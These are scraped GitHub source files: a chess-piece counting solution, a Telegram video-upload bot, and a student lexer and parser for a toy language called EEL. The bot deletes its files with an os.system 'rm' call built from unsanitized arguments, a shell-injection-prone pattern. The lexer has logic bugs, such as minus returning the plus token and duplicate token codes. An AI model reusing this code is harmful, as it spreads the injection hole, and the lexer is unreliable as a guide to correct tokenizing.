\n    \"\"\"\n\n\napp.run(debug=True)\n","repo_name":"insynchq/flask-googlelogin","sub_path":"example_offline.py","file_name":"example_offline.py","file_ext":"py","file_size_in_byte":2036,"program_lang":"python","lang":"en","doc_type":"code","stars":49,"dataset":"github-code","pt":"7"} +{"seq_id":"1919760673","text":"# https://www.acmicpc.net/problem/3003\n\nchese_piece = list(map(int, input().split(\" \")))\n# A full chess set has 1 king, 1 queen, 2 rooks, 2 bishops, 2 knights and 8 pawns.\n## Reference list of piece counts for the check\ncheck_piece = [1, 1, 2, 2, 2, 8]\n\nfor i in range(6):  # all six piece types, including pawns\n    check_piece[i] -= chese_piece[i]\n\nprint(*check_piece, sep=\" \")","repo_name":"ContecPluto/algorithm","sub_path":"Personal_learning/baekjoon/3003_chese.py","file_name":"3003_chese.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"19274416722","text":"from pathlib import Path\r\nimport os\r\nclass Config:\r\n    API_ID = int(os.environ.get('API_ID'))\r\n    API_HASH = os.environ.get('API_HASH')\r\n    BOT_TOKEN2 = os.environ.get('BOT_TOKEN2')\r\n    CHATID = int(os.environ.get('CANAL_Sendvideo'))\r\n\r\nimport secrets\r\nimport argparse\r\nparser = argparse.ArgumentParser(description = 'test')\r\nparser.add_argument('--nomedoarquivo', action = 'store', dest = 'nomedoarquivo',default = 'WORK', required = True,help = 'Name of the video file')\r\nparser.add_argument('--legenda', action = 'store', dest = 'legenda',default = 'WORK', required = True,help = 'Caption for the file')\r\nparser.add_argument('--photo', action = 'store', dest = 'photo',default = 'WORK', required = True,help = 'photo')\r\nparser.add_argument('--photo2', action = 'store', dest = 'photo2',default = 'WORK', required = True,help = 'photo2')\r\narguments = parser.parse_args()\r\n\r\n\r\n\r\nimport asyncio\r\nfrom telethon import TelegramClient, sync\r\nfrom telethon.tl.types import DocumentAttributeVideo\r\nfrom hachoir.metadata import extractMetadata\r\nfrom hachoir.parser import createParser\r\nusuario = secrets.token_hex(15)\r\n# Telegram credentials:\r\nclient = TelegramClient(f'bot{usuario}', Config.API_ID, api_hash=Config.API_HASH).start(bot_token=Config.BOT_TOKEN2)\r\n\r\n# video duration:\r\nfile_name = ('{}'.format(arguments.nomedoarquivo))\r\nDuracao_video = extractMetadata(createParser(file_name))\r\nduration = Duracao_video.get('duration').seconds\r\n\r\n# image dimensions:\r\nfile_foto = ('{}'.format(arguments.photo))\r\nDimensao_Imagem = extractMetadata(createParser(file_foto))\r\n\r\n\r\ntry:\r\n    async def main():\r\n        file = await client.upload_file(file_name)\r\n        await client.send_file(Config.CHATID,file,thumb=f'{arguments.photo}',caption=f'{arguments.legenda}',use_cache=False,attributes=(DocumentAttributeVideo((0, Duracao_video.get('duration').seconds)[Duracao_video.has('duration')],(0, Dimensao_Imagem.get('width'))[Dimensao_Imagem.has('width')],(0, Dimensao_Imagem.get('height'))[Dimensao_Imagem.has('height')],supports_streaming=True),))\r\n        await client.send_file(Config.CHATID, f'{arguments.photo2}' , caption=f'{arguments.legenda}')\r\n        os.system(f'(rm {arguments.nomedoarquivo} && rm {arguments.photo} && rm {arguments.photo2})&')\r\nexcept:\r\n    pass\r\nloop = asyncio.get_event_loop()\r\nloop.run_until_complete(main())\r\n","repo_name":"maizumbotzin/newtango2bot","sub_path":"up.py","file_name":"up.py","file_ext":"py","file_size_in_byte":2329,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"} +{"seq_id":"2858479162","text":"# ***************************** 
#\n# Deligiannis Nikos 2681 #\n# UoI - Spring Semester 2018 #\n# Compilers MYY802 prof G.Manis #\n# Project: Compiler for EEL #\n# ***************************** #\n\n# ********************************************** TERMINAL SYNTAX ********************************************** #\n# #\n# >python EELC.py [source file] [options]< #\n# #\n# -[filename]: The name of the .eel file (Source Code) #\n# -[verbose]: Detailed output of Lexical and Syntactical analysis. #\n# If you do not want a verbosed output simply type '-skip' ! You will be notified about #\n# the test results of Lexical and Syntactical Analysis. #\n# If you want a verbosed output type \"-verbose\" after the [filename] #\n# Due to wealth of text messages, redirected output is strongly reccomended!! #\n# For example python EELC.py example verbose > output.txt! #\n# #\n# *************************************************************************************************************\n\nimport sys\n\n# [PHASE: 1] :: Lexical and Syntactical Analysis\n\n#Global Scope Variables \n\ntoken_dict = dict(alphaTK = 1, # Alpharithmetic - String (e.g Compiler)\n numberTK = 2, # Any Number (e.g 65)\n plusTK = 3, # +\n minusTK = 4, # -\n mulTK = 5, # *\n divTK = 6, # /\n lessTK = 7, # <\n greaTK = 8, # >\n leqTK = 9, # <= \n greqTK = 10, # >= \n eqTK = 11, # =\n difTK = 12, # <>\n assigTK = 13, # :=\n semiTK = 14, # ;\n commaTK = 15, # , \n colonTK = 16, # :\n lbrTK = 17, # (\n rbrTK = 18, # )\n blbrTK = 19, # [\n brbrTK = 20, # ]\n #Commited Words#\n progTK = 100, # program\n eprogTK = 101, # endprogram\n decTK = 102, # declare\n edecTK = 103, # enddeclare\n ifTK = 104, # if\n thenTK = 105, # then\n elseTK = 106, # else\n eifTK = 107, # endif\n whileTK = 108, # while\n ewhileTK = 109, # endwhile\n repTK = 110, # repeat\n erepTK = 111, # endrepeat\n exitTK = 112, # exit\n swiTK = 113, # switch\n caseTK = 114, # case\n eswiTK = 115, # endswitch\n fcaseTK = 116, # forcase\n whenTK = 117, # when\n efcaseTK = 118, # endforcase\n procTK = 119, # procedure\n eprocTK = 120, # endprocedure\n funTK = 121, # function\n efunTK = 122, # endfunction\n callTK = 123, # call\n retTK = 124, # return\n inTK = 124, # in \n inoutTK = 125, # inout\n andTK = 126, # and\n orTK = 127, # or\n notTK = 128, # not \n trueTK = 129, # true \n falseTK = 130, # false\n inputTK = 131, # input\n printTK = 132, # print \n #Special Tokens#\n eofTK = 200, # End of File\n errTK = 201, # Error || Won't be used\n cmtTK = 202) # Comment(s) || Won't be used\n\nglobal max_word_size\nmax_word_size = 30 # An Alpharithmetic can't be over 30 char's long\nglobal line\nline = 1 # The current line (used for debugging messages)\nglobal ret_token\nret_token = 0 # The token lex() will return\nglobal lex_unit\nlex_unit = \"\" # The lexical unit lex() will return\n\nglobal code # File pointer of the Source Code\n\n\n\n# This function is used by lex() in some cases we need to get the previous character \ndef backtrack():\n global code\n position = code.tell()\n code.seek(position - 1)\n\n# Lexical Analysis #\n\ndef lex():\n\n global lex_unit # Linking the Global Variables\n lex_unit = \"\" \n global line \n global ret_token\n global code\n\n while True:\n\n unit = code.read(1)\n \n if not unit : \n \n break # EOF reached break the loop.\n \n if unit == '\\n' : line = line + 1 \n\n if unit == '\\t' : continue # Ignore TABs\n\n if unit.isspace() : continue\n\n # -------------------[State 1 of the FSM]------------------- #\n # -Character found. 
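An identifier or a keyword, e.g.   #\n        #  \"while\" -> whileTK but \"while1\" -> alphaTK (maximal alnum match).   #\n        # -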
Keep reading until you read him whole #\n # -Check for commited words. Else return alphaTK. #\n # -Must be <= 30 characters long. #\n # -IMPORTANT: Backtrack is required after while() #\n # ---------------------------------------------------------- #\n \n if unit.isalpha(): \n\n alpha_flag = 0\n lex_unit = lex_unit + unit\n\n unit = code.read(1)\n\n while ( (unit.isalpha() or unit.isdigit() ) and len(lex_unit) <= max_word_size ):\n\n lex_unit = lex_unit + unit\n\n unit = code.read(1)\n\n if unit == '\\n' : line = line + 1\n\n if(lex_unit != \"endprogram\"): #and unit != '\\n'):\n backtrack()\n\n if lex_unit == \"program\":\n ret_token = token_dict[\"progTK\"]\n return token_dict[\"progTK\"]\n if lex_unit == \"endprogram\":\n ret_token = token_dict[\"eprogTK\"]\n return token_dict[\"eprogTK\"]\n if lex_unit == \"declare\":\n ret_token = token_dict[\"decTK\"]\n return token_dict[\"decTK\"]\n if lex_unit == \"enddeclare\":\n ret_token = token_dict[\"edecTK\"]\n return token_dict[\"edecTK\"]\n if lex_unit == \"if\":\n ret_token = token_dict[\"ifTK\"]\n return token_dict[\"ifTK\"] \n if lex_unit == \"then\":\n ret_token = token_dict[\"thenTK\"]\n return token_dict[\"thenTK\"]\n if lex_unit == \"else\":\n ret_token = token_dict[\"elseTK\"]\n return token_dict[\"elseTK\"]\n if lex_unit == \"endif\":\n ret_token = token_dict[\"eifTK\"]\n return token_dict[\"eifTK\"]\n if lex_unit == \"while\":\n ret_token = token_dict[\"whileTK\"]\n return token_dict[\"whileTK\"]\n if lex_unit == \"endwhile\":\n ret_token = token_dict[\"ewhileTK\"]\n return token_dict[\"ewhileTK\"]\n if lex_unit == \"repeat\":\n ret_token = token_dict[\"repTK\"]\n return token_dict[\"repTK\"]\n if lex_unit == \"endrepeat\":\n ret_token = token_dict[\"erepTK\"]\n return token_dict[\"erepTK\"]\n if lex_unit == \"exit\":\n ret_token = token_dict[\"exitTK\"]\n return token_dict[\"exitTK\"]\n if lex_unit == \"switch\":\n ret_token = token_dict[\"swiTK\"]\n return token_dict[\"swiTK\"]\n if lex_unit == \"case\":\n ret_token = token_dict[\"caseTK\"]\n return token_dict[\"caseTK\"]\n if lex_unit == \"endswitch\":\n ret_token = token_dict[\"eswiTK\"]\n return token_dict[\"eswiTK\"]\n if lex_unit == \"forcase\":\n ret_token = token_dict[\"fcaseTK\"]\n return token_dict[\"fcaseTK\"]\n if lex_unit == \"when\":\n ret_token = token_dict[\"whenTK\"]\n return token_dict[\"whenTK\"]\n if lex_unit == \"endforcase\":\n ret_token = token_dict[\"efcaseTK\"]\n return token_dict[\"efcaseTK\"]\n if lex_unit == \"procedure\":\n ret_token = token_dict[\"procTK\"]\n return token_dict[\"procTK\"]\n if lex_unit == \"endprocedure\":\n ret_token = token_dict[\"eprocTK\"]\n return token_dict[\"eprocTK\"]\n if lex_unit == \"function\":\n ret_token = token_dict[\"funTK\"]\n return token_dict[\"funTK\"]\n if lex_unit == \"endfunction\":\n ret_token = token_dict[\"efunTK\"]\n return token_dict[\"efunTK\"]\n if lex_unit == \"call\":\n ret_token = token_dict[\"callTK\"]\n return token_dict[\"callTK\"]\n if lex_unit == \"return\":\n ret_token = token_dict[\"retTK\"]\n return token_dict[\"retTK\"]\n if lex_unit == \"in\":\n ret_token = token_dict[\"inTK\"]\n return token_dict[\"inTK\"]\n if lex_unit == \"inout\":\n ret_token = token_dict[\"inoutTK\"]\n return token_dict[\"inoutTK\"]\n if lex_unit == \"and\":\n ret_token = token_dict[\"andTK\"]\n return token_dict[\"andTK\"]\n if lex_unit == \"or\":\n ret_token = token_dict[\"orTK\"]\n return token_dict[\"orTK\"]\n if lex_unit == \"not\":\n ret_token = token_dict[\"notTK\"]\n return token_dict[\"notTK\"]\n if lex_unit == 
\"true\":\n ret_token = token_dict[\"trueTK\"]\n return token_dict[\"trueTK\"]\n if lex_unit == \"false\":\n ret_token = token_dict[\"falseTK\"]\n return token_dict[\"falseTK\"]\n if lex_unit == \"input\":\n ret_token = token_dict[\"inputTK\"]\n return token_dict[\"inputTK\"]\n if lex_unit == \"print\":\n ret_token = token_dict[\"printTK\"]\n return token_dict[\"printTK\"]\n\n ret_token = token_dict[\"alphaTK\"] #Default case, its an alpharithmetic (e.g. variableA)\n return token_dict[\"alphaTK\"]\n\n # -------------------[State 2 of the FSM]------------------- #\n # -Digit is found. Read the whole number! #\n # -Constrains: A. number <= 32767 #\n # B. alphabetics not allowed after digit #\n # -IMPORTANT: Backtrack is required at the end! #\n # ---------------------------------------------------------- #\n\n if unit.isdigit():\n\n lex_unit = lex_unit + unit\n\n unit = code.read(1)\n\n while (unit.isdigit()):\n\n lex_unit = lex_unit + unit\n\n unit = code.read(1)\n\n if unit == '\\n' : line = line + 1\n\n if(unit.isalpha()): #[A]\n print(\"\"\"\n ****************************** LEX ERROR ******************************\n \n -Invalid Sequence detected\n --After you cannot have numbers with alpharithmetics in them\n ---Example: Sequence \"123abc\" is not acceptable\n\n -Error spotted at Line: %d\n\n ****************************** LEX ERROR ******************************\n LEX()\"\"\" %(line))\n exit()\n\n tmp_num = int(lex_unit) #[B] :: [NOTE] :: No need to check if the number is >= -32767 ! Grammar will provide the sign \n if tmp_num >= 32767: \n print(\"\"\"\n ****************************** LEX ERROR ******************************\n\n -Invalid Number\n --Acceptable numbers are:\n ---Numbers greater or equal to -32767 [ >= -32767]\n ---Numbers lower or equal to 32767 [<= 32767]\n\n -Error spotted at Line: %d\n\n ****************************** LEX ERROR ******************************\n LEX()\"\"\" %(line))\n exit()\n\n backtrack()\n ret_token = token_dict[\"numberTK\"]\n return token_dict[\"numberTK\"]\n\n if unit == '+':\n \n lex_unit = lex_unit + unit\n ret_token = token_dict[\"plusTK\"]\n return token_dict[\"plusTK\"]\n\n if unit == '-':\n\n lex_unit = lex_unit + unit\n ret_token = token_dict[\"minusTK\"]\n return token_dict[\"plusTK\"]\n\n # -------------------[State 3 of the FSM]------------------- #\n # -Symbol '*' found. Must see what follows in case of error! #\n # -If what follows is '/' then error (closing comments) #\n # -else return '*' + token #\n # -IMPORTANT: Backtrack is required at the end! #\n # ---------------------------------------------------------- #\n\n if unit == '*':\n\n lex_unit = lex_unit + unit\n \n unit = code.read(1)\n\n if unit == '/':\n print(\"\"\"\n ****************************** LEX ERROR ******************************\n\n -You marked the end of a comment section '*/'\n -You havend though marked the start of it '*/'\n\n -Error spotted at Line: %d\n\n ****************************** LEX ERROR ******************************\n LEX()\"\"\" %(line))\n exit()\n\n backtrack()\n ret_token = token_dict[\"mulTK\"]\n return token_dict[\"mulTK\"]\n\n if unit == ',':\n lex_unit = lex_unit + unit\n ret_token = token_dict[\"commaTK\"]\n return token_dict[\"commaTK\"]\n\n # -------------------[State 4 of the FSM]------------------- #\n # -Symbol '/' found. Must see what follows! 
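(worked example:          #\n        #  \"a /* note */ b\" -> alphaTK('a'); the next call skips the comment  #\n        #  via the recursive return lex() and yields alphaTK('b').)            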
#\n # -Three possible scenarios to begin with #\n # [A]: /* Comment initializer #\n # [B]: // Comment until new line #\n # [C]: / Division operator #\n # -IMPORTANT: Backtrack is required in case [C] #\n # -IMPORTANT: In case of comments, lex() has call itself #\n # to return the next lex_unit and token!! #\n # ---------------------------------------------------------- #\n\n if unit == '/':\n\n lex_unit = lex_unit + unit\n\n unit = code.read(1)\n\n if unit == '*': # [A]: Comment initializer found! Keep reading until you find '*/'\n\n tmp_flag = 0\n\n tmp_err = line # Used in case of an error!\n\n while(tmp_flag == 0):\n\n unit = code.read(1)\n\n if unit == '\\n': line = line + 1\n\n if unit == '*':\n\n unit = code.read(1)\n\n if not unit : # Reached EOF without closing comments\n print(\"\"\"\n ****************************** LEX ERROR ******************************\n\n -EOF Reached while reading comments\n --A Comment section has not been terminated\n\n -Comments initiated at Line: %d\n -Error spotted at Line: %d\n\n ****************************** LEX ERROR ******************************\n LEX()\"\"\" %(tmp_err,line))\n exit()\n\n if(unit == '/') : tmp_flag = 1\n\n if not unit : # Reached EOF without closing comments\n print(\"\"\"\n ****************************** LEX ERROR ******************************\n\n -EOF Reached while reading comments\n --A Comment section has not been terminated\n\n -Comments initiated at Line: %d\n -Error spotted at Line: %d\n\n ****************************** LEX ERROR ******************************\n LEX()\"\"\" %(tmp_err,line))\n exit()\n\n return lex() \n\n\n elif unit == '/': # [B]: Comment the whole line\n\n tmp_flag = 0\n\n while(tmp_flag == 0):\n\n unit = code.read(1)\n\n if unit == '\\n': tmp_flag = 1 # End of line reached! Stop!\n\n return lex()\n\n else: # [C]: Division operator. Baktrack required \n\n backtrack()\n ret_token = token_dict[\"divTK\"]\n return token_dict[\"divTK\"]\n\n if unit == '=':\n\n lex_unit = lex_unit + unit\n ret_token = token_dict[\"eqTK\"]\n return token_dict[\"eqTK\"]\n\n if unit == ';':\n #print(\"Semicolon\")\n lex_unit = lex_unit + unit\n ret_token = token_dict[\"semiTK\"]\n return token_dict[\"semiTK\"]\n\n if unit == '(':\n\n lex_unit = lex_unit + unit\n ret_token = token_dict[\"lbrTK\"]\n\n return token_dict[\"lbrTK\"]\n\n if unit == ')':\n\n lex_unit = lex_unit + unit\n ret_token = token_dict[\"rbrTK\"]\n return token_dict[\"rbrTK\"]\n\n if unit == '[':\n\n lex_unit = lex_unit + unit\n ret_token = token_dict[\"blbrTK\"]\n return token_dict[\"blbrTK\"]\n\n if unit == ']':\n\n lex_unit = lex_unit + unit\n ret_token = token_dict[\"brbrTK\"]\n return token_dict[\"brbrTK\"]\n \n # -------------------[State 5 of the FSM]------------------- # \n # -Symbol ':' found. We must check if: #\n # [A]: Symbol '=' follows #\n # [B]: alphabetical or digit follows #\n # -IMPORTANT: Backtrack required for [B]! #\n # ---------------------------------------------------------- #\n\n if unit == ':':\n\n lex_unit = lex_unit + unit\n\n unit = code.read(1)\n\n if unit == '=': # [A]\n\n lex_unit = lex_unit + unit\n ret_token = token_dict[\"assigTK\"]\n return token_dict[\"assigTK\"]\n\n backtrack()\n ret_token = token_dict[\"colonTK\"]\n return token_dict[\"colonTK\"]\n\n # -------------------[State 6 of the FSM]------------------- #\n # -Symbol '<' found. 
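One char of lookahead decides:     #\n        #  \"<=\" -> leqTK, \"<>\" -> difTK; anything else backtracks one char.   #\n        # -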
We must check again if: #\n # [A]: Symbol '=' follows (lower equal operator '<=') #\n # [B]: Symbol '>' follows (different operatior '<>') #\n # [C]: else (lower operator '<') #\n # -IMPORTANT: Backtrack required for [C]! #\n # ---------------------------------------------------------- #\n\n if unit == '<':\n\n lex_unit = lex_unit + unit\n\n unit = code.read(1)\n\n if unit == \"=\": # [A]\n\n lex_unit = lex_unit + unit\n ret_token = token_dict[\"leqTK\"]\n return token_dict[\"leqTK\"]\n\n if unit == \">\": # [B]\n\n lex_unit = lex_unit + unit\n ret_token = token_dict[\"difTK\"]\n return token_dict[\"difTK\"]\n\n # [C]\n\n backtrack()\n ret_token = token_dict[\"leqTK\"]\n return token_dict[\"leqTK\"]\n\n # -------------------[State 7 of the FSM]------------------- #\n # -Symbol '>' found. We must check if: #\n # [A]: Symbol '=' follows (greater equal operator '>=') #\n # [B]: else (greater operator '>') #\n # -IMPORTANT: Backtrack required for [B] #\n # ---------------------------------------------------------- #\n\n if unit == '>':\n\n lex_unit = lex_unit + unit\n\n unit = code.read(1)\n\n if unit == \"=\": # [A]\n\n lex_unit = lex_unit + unit\n ret_token = token_dict[\"greqTK\"]\n return token_dict[\"greqTK\"]\n\n backtrack()\n ret_token = token_dict[\"greaTK\"]\n return token_dict[\"greaTK\"]\n\n # -------------------[State 8 of the FSM]------------------- # \n # -Uknown symbol found. Error! #\n # ---------------------------------------------------------- #\n\n print(\"\"\"[Lex()]::\\\n ***** ERROR *****\n -Uknown character found!\n \"\"\")\n print(\"[Lex()]:: Error found ~at line %d\"%(line))\n exit()\n\n lex_unit = \"EOF\"\n ret_token = token_dict[\"eofTK\"]\n return token_dict[\"eofTK\"]\n\n# Syntax Analysis #\n\n# -- ::= PROGRAM ID ENDPROGRAM -- #\ndef PROGRAM():\n \n if sys.argv[2] == \"-verbose\" : print(\" ===========> START OF SYNTAX !! 
<=========== \")\n if sys.argv[2] == \"-verbose\" : print(\"0.\")\n\n global ret_token\n\n if ret_token == token_dict[\"progTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print (\"\\tPROGRAM\\t\" + lex_unit)\n lex()\n\n if ret_token == token_dict[\"alphaTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print (\"\\tPROGRAM\\t\" + lex_unit)\n lex()\n\n if sys.argv[2] == \"-verbose\" : print (\"*** PROGRAM ==> BLOCK ***\")\n BLOCK()\n \n if ret_token == token_dict[\"eprogTK\"]:\n \n if sys.argv[2] == \"-verbose\" : print (\"\\tPROGRAM\\t\" + lex_unit)\n lex() # EOF is expected\n\n if sys.argv[2] == \"-verbose\" : \n\n if ret_token == token_dict[\"eofTK\"]:\n\n print(\" ===========> END OF FILE REACHED <=========== \")\n\n \n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --Every program shall end with word \"endprogram\" writen!\n --Instead you typed something else or forgot to type it!\n\n -Error spotted at Line: %d\n \n ****************************** SYN ERROR ******************************\n PROGRAM()\"\"\"%(line))\n\n exit()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --Program name expected after \"program\"\n --Instead you typed something else or forgot to type it!\n\n -Error spotted at Line %d\n \n ****************************** SYN ERROR ******************************\n PROGRAM()\"\"\"%(line))\n exit()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --Every program shall begin with word \"program\".\n --Instead You typed something else or forgot to type it!\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ****************************** \n PROGRAM()\"\"\"%(line))\n\n exit()\n\ndef BLOCK():\n\n if sys.argv[2] == \"-verbose\" : print(\"1.\")\n\n if sys.argv[2] == \"-verbose\" : print(\"*** BLOCK ==> DECLARATIONS ***\")\n DECLARATIONS()\n if sys.argv[2] == \"-verbose\" : print(\"*** BLOCK ==> SUBPROGRAMS ***\")\n SUBPROGRAMS()\n if sys.argv[2] == \"-verbose\" : print(\"*** BLOCK ==> STATEMENTS ***\")\n STATEMENTS()\n\n# -- ::= e | DECLARE ENDDECLARE -- #\ndef DECLARATIONS():\n\n if sys.argv[2] == \"-verbose\" : print(\"2.\")\n \n global ret_token\n\n if ret_token == token_dict[\"decTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tDECLARATIONS\\t\" + lex_unit)\n lex()\n\n if sys.argv[2] == \"-verbose\" : print(\"*** DECLARATIONS ==> VARLIST ***\")\n VARLIST() \n\n if ret_token == token_dict[\"edecTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tDECLARATIONS\\t\" + lex_unit)\n lex()\n \n\n else:\n print(\"\"\" \n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --After declaring the variables \"enddeclare\" is expected \n --Instead You typed something else or forgot to type it.\n \n -Error spotted at Line: %d\n \n ****************************** SYN ERROR ******************************\n DECLARATIONS()\"\"\" %(line))\n\n exit()\n\n # e : No Declarations is acceptable\n\n# -- ::= e | ID (, ID)* -- #\ndef VARLIST():\n\n if sys.argv[2] == \"-verbose\" : print(\"3.\")\n\n global ret_token\n\n if ret_token == token_dict[\"alphaTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tVARLIST\\t\" + lex_unit)\n lex()\n\n while(ret_token == token_dict[\"commaTK\"]):\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tVARLIST\\t\" + lex_unit)\n lex()\n \n if ret_token == token_dict[\"alphaTK\"]:\n\n if sys.argv[2] == 
\"-verbose\" : print(\"\\tVARLIST\\t\" + lex_unit)\n lex() \n \n else:\n print(\"\"\" \n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --After comma (',') you have to type a variable's name!\n ---[NOTE]: Read EEL's documentation file to see which\n words are allowed to be used as variable names! \n\n -Error spotted at Line: %d\n \n ****************************** SYN ERROR ******************************\n VARLIST()\"\"\" %(line))\n\n exit()\n\n # e : No Variables is acceptable\n\n# -- ::= ()* -- #\ndef SUBPROGRAMS():\n\n if sys.argv[2] == \"-verbose\" : print(\"4.\")\n\n global ret_token\n\n #Sneak Peek\n while(ret_token == token_dict[\"procTK\"] or ret_token == token_dict[\"funTK\"]):\n\n if sys.argv[2] == \"-verbose\" : print(\"*** SUBPROGRAMS ==> PROCORFUNC***\")\n PROCORFUNC()\n\n # e : Kleene-Star includes e! So missing Function or Procedure is acceptable\n\n# -- ::= PROCEDURE ID ENDPROCEDURE | \n# FUNCTION ID ENDFUNCTION -- #\ndef PROCORFUNC():\n\n if sys.argv[2] == \"-verbose\" : print(\"5.\")\n\n global ret_token\n\n if ret_token == token_dict[\"procTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tPROCORFUNC\\t\" + lex_unit)\n lex()\n\n if ret_token == token_dict[\"alphaTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tPROCORFUNC\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** PROCORFUNC ==> PROCORFUNCBODY ***\")\n PROCORFUNCBODY()\n \n if ret_token == token_dict[\"eprocTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tPROCORFUNC\\t\" + lex_unit)\n lex()\n\n else: \n print(\"\"\" \n ****************************** SYN ERROR ******************************\n -Invalid Syntax\n --After declaring the procedure, you must type \"endprocedure\"\n --Instead you typed something else or forgot to type it!\n \n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n PROCORFUNC()\"\"\" %(line))\n exit()\n\n else:\n print(\"\"\" \n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --You must name the procedure you want to type!\n --Instead you typed something else or forgot to type it!\n\n -Error spotted at Line: %d\n \n ****************************** SYN ERROR ******************************\n PROCORFUNC()\"\"\" %(line))\n exit()\n\n # No need to display an error message. 
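(e.g. for the source \"procedure foo()\",\n    # SUBPROGRAMS has already peeked procTK before dispatching here.)\n    # 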
If there was no procedure Token we wouldn't be here.\n\n elif ret_token == token_dict[\"funTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tPROCORFUNC\\t\" + lex_unit)\n lex()\n \n if ret_token == token_dict[\"alphaTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tPROCORFUNC\\t\" + lex_unit)\n lex()\n \n if sys.argv[2] == \"-verbose\" : print(\"*** PROCORFUNC ==> PROCORFUNCBODY ***\")\n PROCORFUNCBODY()\n\n if ret_token == token_dict[\"efunTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tPROCORFUNC\\t\" + lex_unit)\n lex()\n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --After declaring the function, you must type \"endfunction\".\n --Instead you typed something else or forgot to type it!\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n PROCORFUNC()\"\"\" %(line))\n\n exit()\n\n else:\n print(\"\"\" \n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --You must name the function you want to type!\n --Instead you typed something else or forgot to type it!\n\n -Error spotted at Line: %d \n \n ****************************** SYN ERROR ******************************\n PROCORFUNC()\"\"\" %(line))\n\n exit() \n # No need to display an error message. If there was no function Token we wouldn't be here.\n\n# -- -- #\ndef PROCORFUNCBODY():\n\n if sys.argv[2] == \"-verbose\" : print(\"6.\")\n\n if sys.argv[2] == \"-verbose\" : print(\"*** PROCORFUNCBODY ==> FORMALPARS ***\")\n FORMALPARS()\n if sys.argv[2] == \"-verbose\" : print(\"*** PROCORFUNCBODY ==> BLOCK ***\")\n BLOCK()\n\n# -- ::= () -- #\ndef FORMALPARS():\n\n if sys.argv[2] == \"-verbose\" : print(\"7.\")\n\n global ret_token\n\n if ret_token == token_dict[\"lbrTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFORMALPARS\\t\" + lex_unit)\n lex()\n\n if sys.argv[2] == \"-verbose\" : print(\"*** FORMALPARS ==> FORMALPARLIST ***\")\n FORMALPARLIST()\n\n if ret_token == token_dict[\"rbrTK\"]:\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFORMALPARS\\t\" + lex_unit)\n lex()\n \n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --After declaring the procedure's/function's\n parameters you have to type ')'\n --Instead you typed something else or forgot to type it!\n\n -Error spotted at Line: %d\n \n ****************************** SYN ERROR ******************************\n FORMALPARS()\"\"\" %(line))\n \n exit() \n\n else:\n print(\"\"\"\n ****************************** SYN ERROR ******************************\n\n -Invalid Syntax\n --To start declaring the procedure's/function's \n parameters you have to type '(' !\n --Instead you typed something else or forgot to type it!\n\n -Error spotted at Line: %d\n\n ****************************** SYN ERROR ******************************\n FORMALPARS()\"\"\" %(line))\n\n exit() \n\n# -- ::= (, )* | e -- #\ndef FORMALPARLIST():\n\n if sys.argv[2] == \"-verbose\" : print(\"8.\")\n\n global ret_token\n\n # Sneak Peek\n if (ret_token == token_dict[\"inTK\"] or ret_token == token_dict[\"inoutTK\"]):\n\n if sys.argv[2] == \"-verbose\" : print(\"*** FORMALPARLIST ==> FORMALPARITEM ***\")\n FORMALPARITEM()\n\n while(ret_token == token_dict[\"commaTK\"]):\n\n if sys.argv[2] == \"-verbose\" : print(\"\\tFORMALPARLIST\\t\" + lex_unit)\n lex()\n\n if sys.argv[2] == \"-verbose\" : print(\"*** FORMALPARLIST ==> FORMALPARITEM ***\")\n FORMALPARITEM()\n\n # e 
: Not determining parameters is acceptable.\n\n# -- <FORMALPARITEM> ::= IN ID | INOUT ID -- #\ndef FORMALPARITEM():\n\n    if sys.argv[2] == \"-verbose\" : print(\"9.\")\n\n    global ret_token\n\n    if ret_token == token_dict[\"inTK\"]:\n\n        if sys.argv[2] == \"-verbose\" : print(\"\\tFORMALPARITEM\\t\" + lex_unit)\n        lex()\n\n        if ret_token == token_dict[\"alphaTK\"]:\n\n            if sys.argv[2] == \"-verbose\" : print(\"\\tFORMALPARITEM\\t\" + lex_unit)\n            lex()\n\n        else:\n            print(\"\"\"\n        ****************************** SYN ERROR ******************************\n\n        -Invalid Syntax\n        --After declaring the variable's scope (in) you have to\n          name the variable (e.g. in temp)\n        --Instead you typed something else or forgot to type it!\n\n        -Error spotted at Line: %d\n\n        ****************************** SYN ERROR ******************************\n        FORMALPARITEM()\"\"\" %(line))\n\n            exit()\n\n    elif ret_token == token_dict[\"inoutTK\"]:\n\n        if sys.argv[2] == \"-verbose\" : print(\"\\tFORMALPARITEM\\t\" + lex_unit)\n        lex()\n\n        if ret_token == token_dict[\"alphaTK\"]:\n\n            if sys.argv[2] == \"-verbose\" : print(\"\\tFORMALPARITEM\\t\" + 